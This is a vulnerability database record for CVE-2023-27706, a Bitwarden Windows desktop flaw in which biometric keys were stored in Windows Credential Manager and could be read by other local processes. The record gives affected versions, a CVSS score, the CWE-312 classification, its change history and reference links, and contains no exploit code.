CVE-2023-27706

Bitwarden Windows desktop application versions prior to v2023.4.0 store biometric keys in Windows Credential Manager, accessible to other local unprivileged processes.
Configurations

Configuration 1 (hide)

cpe:2.3:a:bitwarden:bitwarden:*:*:*:*:desktop:*:*:*

History

15 Aug 2023, 17:15

Type Values Removed Values Added
Summary Bitwarden Desktop v1.20.0 and above stores the biometric key in plaintext which allows a local attacker to decrypt the entire local vault. Bitwarden Windows desktop application versions prior to v2023.4.0 store biometric keys in Windows Credential Manager, accessible to other local unprivileged processes.

16 Jun 2023, 18:24

Type Values Removed Values Added
CPE cpe:2.3:a:bitwarden:bitwarden:*:*:*:*:desktop:*:*:*
CVSS v2 : unknown
v3 : unknown
v2 : unknown
v3 : 7.1
First Time Bitwarden
Bitwarden bitwarden
References (MISC) https://github.com/bitwarden/clients - (MISC) https://github.com/bitwarden/clients - Product
References (MISC) https://github.com/bitwarden/clients/blob/8b5a223ad4ca0f89b6c9bcdbddef464d1755d2c0/apps/desktop/desktop_native/src/biometric/windows.rs#L19 - (MISC) https://github.com/bitwarden/clients/blob/8b5a223ad4ca0f89b6c9bcdbddef464d1755d2c0/apps/desktop/desktop_native/src/biometric/windows.rs#L19 - Product
References (MISC) https://hackerone.com/reports/1874155 - (MISC) https://hackerone.com/reports/1874155 - Exploit, Issue Tracking, Third Party Advisory
References (MISC) https://github.com/bitwarden/clients/blob/8b5a223ad4ca0f89b6c9bcdbddef464d1755d2c0/apps/desktop/desktop_native/src/password/windows.rs#L16 - (MISC) https://github.com/bitwarden/clients/blob/8b5a223ad4ca0f89b6c9bcdbddef464d1755d2c0/apps/desktop/desktop_native/src/password/windows.rs#L16 - Product
CWE CWE-312

09 Jun 2023, 19:15

Type Values Removed Values Added
New CVE

Information

Published : 2023-06-09 19:15

Updated : 2024-02-28 20:13


NVD link : CVE-2023-27706

Mitre link : CVE-2023-27706

CVE.ORG link : CVE-2023-27706


JSON object : View

Products Affected

bitwarden

  • bitwarden
CWE
CWE-312

Cleartext Storage of Sensitive Information